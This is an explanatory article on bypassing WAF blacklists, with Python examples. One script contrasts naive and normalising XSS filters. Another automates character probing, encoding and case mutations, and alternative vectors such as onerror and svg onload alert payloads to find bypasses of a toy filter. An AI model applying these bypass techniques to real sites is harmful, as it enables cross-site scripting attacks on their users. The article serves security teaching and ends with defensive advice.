Web Application Firewall(WAF) Bypass Techniques

Introduction

This article describes the techniques used to bypass web application firewalls (WAFs). It focuses primarily on blacklists and on how blacklists are bypassed.

WHAT IS A WAF

As already mentioned, WAF stands for web application firewall. A WAF sits in front of a web application and inspects HTTP requests (and often responses), blocking those that look like attacks, such as SQL injection or cross-site scripting, before they reach the application. It is not an access-control mechanism: its job is to filter malicious input, not to decide who may use the site.

A WAF generally implements a blacklist, a whitelist, or both to decide which requests to filter out.

So What is a Blacklist?

A blacklist is a set of known-malicious patterns (commands, statements, strings, usually expressed as signatures or regular expressions) that the WAF blocks when it finds them in a request; think of it as a "deny list". Anything that does not match the list is allowed through.

SO WHAT IS A WHITELIST?

A whitelist is the opposite: a definition of what is allowed (for example the expected parameters, their types, lengths and character sets, or trusted source addresses), with anything outside it rejected; think of it as an "allow-only list". Whitelists are much harder to bypass, but they have to be written for each application.

The Issue with Blacklists

The issue with blacklists is that they only filter pre-existing, commonly known payloads. Because a blacklist is typically a collection of regular-expression signatures, it catches only the forms those signatures were written for: a rule that filters <image/src/onerror=prompt(8)> but was not written case-insensitively will happily allow <imAge/srC/oNError=pRompt(8)>, even though browsers treat tag and attribute names case-insensitively and both payloads execute identically.

Blacklisting is also tricky because a non-malicious request can match a signature and be blocked (a false positive), which is bad both for the user, whose legitimate request fails, and for the owner of the web app, who loses traffic and gains support tickets.
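The two problems above, a case-sensitive literal signature that misses a trivially mutated payload and a broader rule that catches benign input, can be seen side by side in a small Python model. This is an added example, not code from the original article or from any real WAF; the signatures and sample inputs are constructed for illustration, and the normalisation step only borrows the idea behind ModSecurity's transformation functions (t:urlDecodeUni, t:htmlEntityDecode, t:lowercase), not their implementation.

```python
import html
import re
from urllib.parse import unquote

# Constructed, naive blocklist of the kind described above: literal,
# case-sensitive signatures applied to the raw request value.
NAIVE_SIGNATURES = [
    re.compile(r"<image/src/onerror=prompt\(\d+\)>"),
    re.compile(r"<script>"),
]


def naive_is_blocked(value: str) -> bool:
    """Block only when a literal signature matches the raw input."""
    return any(sig.search(value) for sig in NAIVE_SIGNATURES)


# Hardened version: normalise the input first, then match the *structure*
# of an attack rather than one literal spelling of it.
STRUCTURAL_SIGNATURES = [
    # any tag that carries an on<event>= attribute: <img src=x onerror=...>
    re.compile(r"<\s*[a-z][a-z0-9]*[^>]*\s+on[a-z]+\s*="),
    re.compile(r"<\s*script\b"),
]


def normalise(value: str) -> str:
    """Undo the transformations attackers use to hide a payload.

    Same idea as ModSecurity's t:urlDecodeUni / t:htmlEntityDecode /
    t:lowercase; the exact steps here are our own (assumption).
    """
    decoded = unquote(unquote(value))  # single and double URL encoding
    decoded = html.unescape(decoded)   # &lt; &#x3c; &#60; -> <
    decoded = decoded.lower()          # tag/attribute names are case-insensitive
    # Browsers accept '/' and tabs/newlines as separators between attributes.
    return re.sub(r"[\t\n\r\f/]+", " ", decoded)


def structural_is_blocked(value: str) -> bool:
    normalised = normalise(value)
    return any(sig.search(normalised) for sig in STRUCTURAL_SIGNATURES)


if __name__ == "__main__":
    # Constructed sample inputs.
    samples = [
        "<image/src/onerror=prompt(8)>",            # the signature's own payload
        "<imAge/srC/oNError=pRompt(8)>",            # case-mutated
        "%3CimAge%2FsrC%2FoNError%3DpRompt(8)%3E",  # URL-encoded
        '<a href="/docs">read the docs</a>',        # benign markup
        '<a title="click once=1">',                 # benign, but looks like on*=
    ]
    for s in samples:
        print(f"{s!r:48} naive={naive_is_blocked(s)!s:5} "
              f"structural={structural_is_blocked(s)}")
```

The naive filter stops the one spelling it was written for and nothing else; the structural filter catches the case-mutated and URL-encoded variants but, as the last sample shows, also blocks an innocent title attribute containing "once=". That trade-off is inherent to blacklisting: the broader the signature, the more false positives it produces.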

Not all attacks can be prevented by a WAF

Vulnerabilities that do not need a recognisable malicious payload, such as IDORs (insecure direct object references) or business-logic flaws, look like ordinary legitimate requests to a WAF and are not prevented by it. In some cases such a bug can be chained with a WAF bypass to escalate the impact of the finding.

TECHNIQUES USED TO BYPASS A BLACKLIST

  1. Figure out what the blacklist filters by submitting payloads in input fields and altering them. Start by sending the special characters ', ", `, \, <, >, $, #, %, {, } one at a time and note which are blocked, and what a block looks like (status code, block page, error message) so you can recognise it later.

  2. Once you know which characters and keywords are filtered, build a payload that contains them and try encoding it (URL, double URL, HTML entities, Unicode; base64 only where the application itself decodes base64) to see whether the WAF inspects the decoded form or only the raw bytes.

  3. Use payloads that are seen less often, for example <iframe> or other tags and event handlers that signature lists tend to omit.

  4. Alter the form of the payload without changing its meaning: change the case of certain characters, add whitespace (or characters the browser treats as a separator, such as / between tag attributes), etc.
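The four steps above, run end to end against a toy target, as an added Python example that is not part of the original article. The blocklist it probes (TOY_BLOCKLIST), the payloads and the helper names are all constructed for illustration; against a real WAF, is_blocked would be a function that sends the request and interprets the response.

```python
import re
from urllib.parse import quote

# --- Constructed target: a small, case-sensitive blocklist applied to the raw
# request value. It stands in for the WAF you would otherwise have to probe.
TOY_BLOCKLIST = re.compile("['\"]|<script|onerror=")


def toy_is_blocked(value: str) -> bool:
    return bool(TOY_BLOCKLIST.search(value))


# --- Step 1: find out which characters the blocklist reacts to. --------------
SPECIAL_CHARS = ["'", '"', "`", "\\", "<", ">", "$", "#", "%", "{", "}"]


def probe_characters(is_blocked, template: str = "probe{}probe") -> list:
    """Send each special character alone inside harmless text and return the
    ones that get blocked. is_blocked is whatever oracle you have for the
    target (here the toy filter; for a real WAF, the status or block page)."""
    return [c for c in SPECIAL_CHARS if is_blocked(template.format(c))]


# --- Steps 2 and 4: mutate a payload without changing what the browser runs.
def alternate_case(payload: str) -> str:
    """aBcD-style case mutation of every letter; HTML tag and attribute
    names are case-insensitive, so the payload still executes."""
    out, upper = [], False
    for ch in payload:
        if ch.isalpha():
            out.append(ch.upper() if upper else ch.lower())
            upper = not upper
        else:
            out.append(ch)
    return "".join(out)


MUTATORS = {
    "url": lambda p: quote(p, safe=""),
    "double_url": lambda p: quote(quote(p, safe=""), safe=""),
    "html_entities": lambda p: "".join(f"&#x{ord(c):x};" for c in p),
    "alternate_case": alternate_case,
    "slash_whitespace": lambda p: p.replace(" ", "/"),
    "tab_whitespace": lambda p: p.replace(" ", "\t"),
}


def find_bypasses(payload: str, is_blocked) -> list:
    """Return the names of the mutations the filter lets through."""
    return [name for name, mutate in MUTATORS.items()
            if not is_blocked(mutate(payload))]


# --- Step 3: vectors that signature lists often omit. ------------------------
ALTERNATIVE_VECTORS = [
    "<script>alert(1)</script>",          # the common one, usually blocked
    "<svg onload=alert(1)>",              # different event handler
    "<iframe src=javascript:alert(1)>",   # iframe instead of img/script
]


def find_alternative_vectors(is_blocked) -> list:
    return [v for v in ALTERNATIVE_VECTORS if not is_blocked(v)]


BASE_PAYLOAD = "<img src=x onerror=alert(1)>"  # constructed starting payload

if __name__ == "__main__":
    print("blocked characters:", probe_characters(toy_is_blocked))
    print("base payload blocked:", toy_is_blocked(BASE_PAYLOAD))
    for name in find_bypasses(BASE_PAYLOAD, toy_is_blocked):
        print(f"bypass via {name}: {MUTATORS[name](BASE_PAYLOAD)!r}")
    print("alternative vectors not blocked:",
          find_alternative_vectors(toy_is_blocked))
```

Two things to check before calling any of these a bypass. First, the encoded variants (url, double_url, html_entities) only matter if something downstream decodes them where the payload lands; an HTML-entity-encoded `<` in a page body is rendered as a literal character, not a tag. Second, a WAF that normalises input before matching (lower-casing, URL-decoding) will catch the case and encoding mutations, which is exactly why step 1 has to be repeated after every change to the filter's behaviour you observe.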

Conclusion

In conclusion, web application firewalls (WAFs) play a useful role in protecting web applications from attack. They apply rules and filters to block malicious requests while letting legitimate traffic through, and most of them rely on blacklists of known-bad patterns. Attackers, however, try to bypass WAFs with techniques such as encoding, case and whitespace manipulation, less common payloads, and abuse of request features the WAF does not inspect.

To protect against these techniques, organisations should keep their WAF rule sets and web applications up to date, prefer whitelist (positive) rules where the application's inputs are well defined, and treat the WAF as one layer only: the application itself must still validate input and encode output, because a WAF bypass is otherwise a full compromise. They should also monitor traffic passing through the WAF, both blocked requests and suspicious ones that were allowed, for signs of probing. By implementing multiple layers of defence and staying vigilant, organisations can better protect their web applications and the data behind them.

FURTHER READING:

yeswehack's article on WAF bypass: https://blog.yeswehack.com/yeswerhackers/web-application-firewall-bypass/

Somdev Sangwan's article on ModSecurity bypass: https://s0md3v.github.io/blog/modsecurity-rce-bypass